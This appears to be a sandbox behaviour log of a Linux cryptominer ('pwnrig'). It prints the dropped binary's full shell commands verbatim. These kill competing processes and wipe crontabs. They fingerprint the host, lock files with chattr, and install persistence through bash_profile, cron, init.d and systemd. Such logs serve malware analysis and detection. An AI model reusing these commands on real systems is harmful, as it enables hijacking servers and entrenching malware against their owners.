/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:3240
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:3242
/bin/psps -A "-ostat,ppid"4⤵
- Reads runtime system information
/usr/bin/idid -u4⤵PID:3244
/bin/grepgrep -v grep4⤵PID:3247
/bin/grepgrep /etc/cron4⤵PID:3246
/bin/psps x4⤵
- Reads CPU attributes
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:3249
/usr/bin/idid -u4⤵PID:3250
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵PID:3255
/bin/grepgrep -v /usr/sbin/httpd4⤵PID:3254
/bin/grepgrep -v -- "-bash[[:space:]]*\$"4⤵PID:3253
/bin/grepgrep -v grep4⤵PID:3252
/bin/psps aux4⤵
- Reads runtime system information
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"3⤵PID:3257
/usr/bin/idid -u4⤵PID:3258
- Executes dropped EXE
- Writes file to tmp directory
/usr/bin/crontabcrontab -r2⤵PID:3272
/usr/bin/pkillpkill -f .klibsystem52⤵
- Reads runtime system information
/usr/bin/pkillpkill -f .klibsystem42⤵
- Reads runtime system information
/bin/bashbash -c "echo \"* * * * * /opt/.klibsystem5 >/dev/null 2>&1\" | crontab -"2⤵PID:3275
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
/usr/bin/chattrchattr -ia /etc/cron.d/.lib-knlib42⤵PID:3278
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib42⤵PID:3279
/usr/bin/chattrchattr -ia /var/spool/cron/.lib-knlib42⤵PID:3280
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib42⤵PID:3281
/usr/bin/chattrchattr -ia /etc/cron.hourly/.lib-knlib42⤵PID:3282
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib42⤵
- Attempts to change immutable files
/usr/bin/chattrchattr -ia /etc/cron.daily/.lib-knlib42⤵
- Attempts to change immutable files
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib42⤵PID:3285
/usr/bin/chattrchattr -ia /etc/cron.weekly/.lib-knlib42⤵PID:3286
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib42⤵PID:3287
/usr/bin/chattrchattr -ia /etc/cron.monthly/.lib-knlib42⤵PID:3288
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib42⤵
- Attempts to change immutable files
/usr/bin/chattrchattr -ia /etc/anacrontab2⤵PID:3290
/usr/bin/chattrchattr +ia /etc/anacrontab2⤵PID:3291
- Executes dropped EXE
- Writes file to tmp directory
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn2⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:3293 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵PID:3294
/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:3323
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:3325
/bin/psps -A "-ostat,ppid"4⤵
- Reads CPU attributes
- Reads runtime system information
/usr/bin/idid -u4⤵PID:3327
/bin/grepgrep -v grep4⤵PID:3330
/bin/grepgrep /etc/cron4⤵PID:3329
/bin/psps x4⤵
- Reads runtime system information
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\\\\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"3⤵
- Attempts to change immutable files
- Writes file to tmp directory
PID:3332 -
/usr/bin/idid -u4⤵PID:3333
/usr/bin/idid -u4⤵PID:3334
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"4⤵PID:3335
/bin/rmrm -rf /bin/bprofr4⤵PID:3336
/bin/sedsed -i /bprofr/d "~/.bash_profile"4⤵PID:3337
/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr4⤵
- Writes file to system bin folder
/usr/bin/idid -u4⤵PID:3339
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"4⤵PID:3340
/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly4⤵PID:3341
/usr/bin/chattrchattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵PID:3342
/bin/rmrm -rf /bin/crondr4⤵PID:3343
/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr4⤵
- Writes file to system bin folder
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵PID:3348
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵PID:3349
/usr/bin/whichwhich chkconfig4⤵PID:3350
/usr/bin/whichwhich update-rc.d4⤵PID:3351
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr4⤵
- Attempts to change immutable files
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable4⤵
- Flushes firewall rules
PID:3353 -
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3354
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3354
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3354
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:3354
/sbin/systemctlsystemctl daemon-reload5⤵PID:3354
/bin/systemctlsystemctl daemon-reload5⤵PID:3354
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove4⤵PID:3375
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3376
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3376
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3376
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:3376
/sbin/systemctlsystemctl daemon-reload5⤵PID:3376
/bin/systemctlsystemctl daemon-reload5⤵PID:3376
/bin/rmrm -rf /bin/initdr4⤵PID:3397
/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr4⤵
- Writes file to system bin folder
/usr/bin/teetee /etc/init.d/pwnrig4⤵
- Modifies init.d
/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig4⤵
- Modifies init.d
/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr4⤵PID:3402
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults4⤵PID:3403
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3404
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3404
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3404
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:3404
/sbin/systemctlsystemctl daemon-reload5⤵PID:3404
/bin/systemctlsystemctl daemon-reload5⤵PID:3404
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable4⤵PID:3425
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3426
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3426
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3426
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:3426
/sbin/systemctlsystemctl daemon-reload5⤵PID:3426
/bin/systemctlsystemctl daemon-reload5⤵
- Reads runtime system information
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr4⤵PID:3447
/usr/bin/whichwhich systemctl4⤵PID:3448
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵PID:3449
/bin/rmrm -rf /bin/sysdr4⤵PID:3450
/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr4⤵
- Writes file to system bin folder
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
- Modifies systemd
/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵PID:3454
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵
- Attempts to change immutable files
/bin/systemctlsystemctl enable pwnrige.service4⤵PID:3456
/bin/systemctlsystemctl enable pwnrigl.service4⤵PID:3477
/bin/systemctlsystemctl daemon-reload4⤵PID:3498
/bin/systemctlsystemctl reload-or-restart pwnrige.service4⤵PID:3519
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d2⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:3561 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵PID:3585
/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:3616
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:3618
/bin/psps -A "-ostat,ppid"4⤵
- Reads CPU attributes
- Reads runtime system information
/usr/bin/idid -u4⤵PID:3620
/bin/grepgrep /etc/cron4⤵PID:3622
/bin/grepgrep -v grep4⤵PID:3623
/bin/psps x4⤵PID:3621
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:3625
/usr/bin/idid -u4⤵PID:3626
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵PID:3631
/bin/grepgrep -v /usr/sbin/httpd4⤵PID:3630
/bin/grepgrep -v -- "-bash[[:space:]]*\$"4⤵PID:3629
/bin/grepgrep -v grep4⤵PID:3628
/bin/psps aux4⤵
- Reads CPU attributes
- Reads runtime system information
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"3⤵PID:3633
/usr/bin/idid -u4⤵PID:3634
/bin/hostnamehostname -I1⤵PID:1834
/usr/bin/awkawk "{print \$1}"1⤵PID:1836
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:1841
/usr/bin/headhead -n 11⤵PID:1840
/bin/grepgrep "Port "1⤵PID:1839
/bin/catcat /etc/ssh/sshd_config1⤵PID:1838
/bin/sedsed -e "s/\$//"1⤵PID:1850
/bin/sedsed -e "s/^ *//"1⤵PID:1849
/usr/bin/cutcut -d: -f21⤵PID:1848
/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
/usr/bin/awkawk "{print \$1}"1⤵PID:1853
/usr/bin/awkawk "{print \$4}"1⤵PID:1856
/usr/bin/awkawk "{print \$4}"1⤵PID:1859
/bin/hostnamehostname -I1⤵
- Attempts to change immutable files
/usr/bin/awkawk "{print \$1}"1⤵PID:2106
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:2111
/usr/bin/headhead -n 11⤵PID:2110
/bin/grepgrep "Port "1⤵PID:2109
/bin/catcat /etc/ssh/sshd_config1⤵PID:2108
/bin/sedsed -e "s/\$//"1⤵PID:2120
/usr/bin/cutcut -d: -f21⤵PID:2118
/bin/sedsed -e "s/^ *//"1⤵PID:2119
/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
/usr/bin/awkawk "{print \$1}"1⤵PID:2123
/usr/bin/awkawk "{print \$4}"1⤵PID:2126
/usr/bin/awkawk "{print \$4}"1⤵PID:2129
/bin/grepgrep -- "-bash[[:space:]]*\$"1⤵PID:2152
/usr/bin/wcwc -l1⤵PID:2154
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"1⤵PID:2153
/bin/grepgrep -v grep1⤵PID:2151
/bin/psps aux1⤵PID:2150
/usr/bin/crontabcrontab -r1⤵PID:2171
/usr/bin/pkillpkill -f .klibsystem51⤵
- Reads CPU attributes
- Reads runtime system information
/usr/bin/pkillpkill -f .klibsystem41⤵PID:2173
/bin/bashbash -c "echo \"* * * * * /dev/shm/.klibsystem5 >/dev/null 2>&1\" | crontab -"1⤵PID:2174
/usr/bin/crontabcrontab -2⤵PID:2176
- Executes dropped EXE
- Writes file to tmp directory
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:2178 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵PID:2179
/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:2208
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵PID:2210
/bin/psps -A "-ostat,ppid"3⤵PID:2209
/usr/bin/idid -u3⤵PID:2212
/bin/grepgrep -v grep3⤵PID:2215
/bin/grepgrep /etc/cron3⤵PID:2214
/bin/psps x3⤵
- Reads runtime system information
